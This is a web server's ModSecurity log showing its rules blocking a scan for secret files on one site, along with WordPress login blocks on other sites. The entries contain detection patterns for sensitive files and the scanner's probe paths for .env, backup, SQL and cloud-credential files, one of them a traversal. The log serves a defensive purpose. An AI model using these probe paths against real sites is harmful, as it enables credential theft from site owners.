[Tue May 26 19:50:26.292974 2026] [security2:error] [pid 86490:tid 86623] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/wp-content/plugins/wp-mail-smtp/.env"] [unique_id "ahWsKlZMwN0DpLVWo6KNSwAAAIg"]
[Tue May 26 19:50:26.614379 2026] [security2:error] [pid 86490:tid 86699] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/docker/app/.env"] [unique_id "ahWsKlZMwN0DpLVWo6KNWgAAANQ"]
[Tue May 26 19:50:26.939088 2026] [security2:error] [pid 86490:tid 86636] [client 113.182.58.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsKlZMwN0DpLVWo6KNVgAAAJU"]
[Tue May 26 19:50:26.948926 2026] [security2:error] [pid 86490:tid 86668] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/sqlite/.env"] [unique_id "ahWsKlZMwN0DpLVWo6KNYQAAALU"]
[Tue May 26 19:50:27.288461 2026] [security2:error] [pid 86490:tid 86625] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/rum/.env"] [unique_id "ahWsK1ZMwN0DpLVWo6KNcgAAAIo"]
[Tue May 26 19:50:27.571092 2026] [security2:error] [pid 86490:tid 86526] [remote 173.236.215.92:56352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.215.236.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWsK1ZMwN0DpLVWo6KNewAA9CM"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 19:50:27.966856 2026] [security2:error] [pid 86490:tid 86656] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/wp-config-sample.php.bak"] [unique_id "ahWsK1ZMwN0DpLVWo6KNjAAAAKk"]
[Tue May 26 19:50:28.304256 2026] [security2:error] [pid 86490:tid 86627] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/gcp.php.bak"] [unique_id "ahWsLFZMwN0DpLVWo6KNngAAAIw"]
[Tue May 26 19:50:28.551963 2026] [security2:error] [pid 86490:tid 86639] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsLFZMwN0DpLVWo6KNkgAAAJg"]
[Tue May 26 19:50:28.641865 2026] [security2:error] [pid 86490:tid 86643] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/:80/.env"] [unique_id "ahWsLFZMwN0DpLVWo6KNrgAAAJw"]
[Tue May 26 19:50:29.844187 2026] [security2:error] [pid 86490:tid 86628] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/post-deployment/.vscode/.env"] [unique_id "ahWsLVZMwN0DpLVWo6KOLQAAAI0"]
[Tue May 26 19:50:30.353747 2026] [security2:error] [pid 86490:tid 86679] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/etc/boto.cfg"] [unique_id "ahWsLlZMwN0DpLVWo6KOQgAAAMA"]
[Tue May 26 19:50:30.887405 2026] [security2:error] [pid 86490:tid 86738] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsLlZMwN0DpLVWo6KOSwAAAPs"]
[Tue May 26 19:50:31.370775 2026] [security2:error] [pid 86490:tid 86630] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/cdw-backend/.env"] [unique_id "ahWsL1ZMwN0DpLVWo6KOYwAAAI8"]
[Tue May 26 19:50:31.539226 2026] [security2:error] [pid 86490:tid 86629] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/locations/.env"] [unique_id "ahWsL1ZMwN0DpLVWo6KOZwAAAI4"]
[Tue May 26 19:50:31.878171 2026] [security2:error] [pid 86490:tid 86654] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/export.sql"] [unique_id "ahWsL1ZMwN0DpLVWo6KOeAAAAKc"]
[Tue May 26 19:50:32.217135 2026] [security2:error] [pid 86490:tid 86663] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/connection.php.old"] [unique_id "ahWsMFZMwN0DpLVWo6KOhgAAALA"]
[Tue May 26 19:50:32.385753 2026] [security2:error] [pid 86490:tid 86710] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/Exercise.Frontend/.env"] [unique_id "ahWsMFZMwN0DpLVWo6KOiQAAAN8"]
[Tue May 26 19:50:32.723515 2026] [security2:error] [pid 86490:tid 86687] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/twitch/.env"] [unique_id "ahWsMFZMwN0DpLVWo6KOmgAAAMg"]
[Tue May 26 19:50:33.230720 2026] [security2:error] [pid 86490:tid 86722] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/:8080/.env"] [unique_id "ahWsMVZMwN0DpLVWo6KOqAAAAOs"]
[Tue May 26 19:50:33.230877 2026] [security2:error] [pid 86490:tid 86519] [remote 178.156.182.155:38692] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWsMVZMwN0DpLVWo6KOnQAAvRw"]
[Tue May 26 19:50:33.399610 2026] [security2:error] [pid 86490:tid 86655] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/keys/wp-config.sql"] [unique_id "ahWsMVZMwN0DpLVWo6KOrAAAAKg"]
[Tue May 26 19:50:33.567907 2026] [security2:error] [pid 86490:tid 86634] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/authorization/.env"] [unique_id "ahWsMVZMwN0DpLVWo6KOtgAAAJM"]
[Tue May 26 19:50:33.735877 2026] [security2:error] [pid 86490:tid 86728] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/restaurant-app/api/.env"] [unique_id "ahWsMVZMwN0DpLVWo6KOvQAAAPE"]
[Tue May 26 19:50:33.904213 2026] [security2:error] [pid 86490:tid 86646] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsMVZMwN0DpLVWo6KOrwAAAJ8"]
[Tue May 26 19:50:34.244766 2026] [security2:error] [pid 86490:tid 86659] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/..%2F..%2F..%2F..%2F..%2Fapp/.env"] [unique_id "ahWsMlZMwN0DpLVWo6KOyQAAAKw"]
[Tue May 26 19:50:34.413504 2026] [security2:error] [pid 86490:tid 86638] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backup.sql"] [unique_id "ahWsMlZMwN0DpLVWo6KO0AAAAJc"]
[Tue May 26 19:50:34.582476 2026] [security2:error] [pid 86490:tid 86679] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/database.bak"] [unique_id "ahWsMlZMwN0DpLVWo6KO1AAAAMA"]
[Tue May 26 19:50:34.920619 2026] [security2:error] [pid 86490:tid 86656] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/express-app/server/.env"] [unique_id "ahWsMlZMwN0DpLVWo6KO4AAAAKk"]
[Tue May 26 19:50:35.258427 2026] [security2:error] [pid 86490:tid 86745] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/website/.env.bak"] [unique_id "ahWsM1ZMwN0DpLVWo6KO7gAAAQI"]
[Tue May 26 19:50:35.426652 2026] [security2:error] [pid 86490:tid 86727] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/hotel-app/backend/.env"] [unique_id "ahWsM1ZMwN0DpLVWo6KO9QAAAPA"]
[Tue May 26 19:50:35.579952 2026] [security2:error] [pid 86490:tid 86719] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsM1ZMwN0DpLVWo6KO5wAAAOg"]
[Tue May 26 19:50:36.614639 2026] [security2:error] [pid 86490:tid 86739] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/directus/.env"] [unique_id "ahWsNFZMwN0DpLVWo6KPHQAAAPw"]
[Tue May 26 19:50:36.783782 2026] [security2:error] [pid 86490:tid 86695] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/private/readme.bak"] [unique_id "ahWsNFZMwN0DpLVWo6KPIQAAANA"]
[Tue May 26 19:50:37.799113 2026] [security2:error] [pid 86490:tid 86667] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/apm/.env"] [unique_id "ahWsNVZMwN0DpLVWo6KPSAAAALQ"]
[Tue May 26 19:50:37.968280 2026] [security2:error] [pid 86490:tid 86659] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/app/etc/env.php.orig"] [unique_id "ahWsNVZMwN0DpLVWo6KPUgAAAKw"]
[Tue May 26 19:50:38.477536 2026] [security2:error] [pid 86490:tid 86718] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/ui/.env"] [unique_id "ahWsNlZMwN0DpLVWo6KPYQAAAOc"]
[Tue May 26 19:50:38.728244 2026] [security2:error] [pid 86490:tid 86739] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsNlZMwN0DpLVWo6KPXQAAAPw"]
[Tue May 26 19:50:38.814741 2026] [security2:error] [pid 86490:tid 86669] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/blog-app/api/.env"] [unique_id "ahWsNlZMwN0DpLVWo6KPbAAAALY"]
[Tue May 26 19:50:39.148774 2026] [security2:error] [pid 86490:tid 86684] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWsN1ZMwN0DpLVWo6KPeQAAAMU"]
[Tue May 26 19:50:39.148802 2026] [security2:error] [pid 86490:tid 86684] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWsN1ZMwN0DpLVWo6KPeQAAAMU"]
[Tue May 26 19:50:39.149457 2026] [security2:error] [pid 86490:tid 86735] [client 65.109.156.37:62688] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/blog-2/blog-boxed-column/"] [unique_id "ahWsN1ZMwN0DpLVWo6KPdwAAAPg"]
[Tue May 26 19:50:39.596446 2026] [security2:error] [pid 86490:tid 86562] [remote 167.71.130.119:38586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.130.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWsN1ZMwN0DpLVWo6KPiAAA30c"]
[Tue May 26 19:50:39.666619 2026] [security2:error] [pid 86490:tid 86675] [client 185.177.72.53:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/search.php.orig"] [unique_id "ahWsN1ZMwN0DpLVWo6KPmQAAALw"]
[Tue May 26 19:50:39.712400 2026] [security2:error] [pid 86490:tid 86570] [remote 160.250.186.220:42244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWsN1ZMwN0DpLVWo6KPkwAAlk8"]
[Tue May 26 19:50:39.741405 2026] [security2:error] [pid 86490:tid 86683] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWsN1ZMwN0DpLVWo6KPmgAAAMQ"]
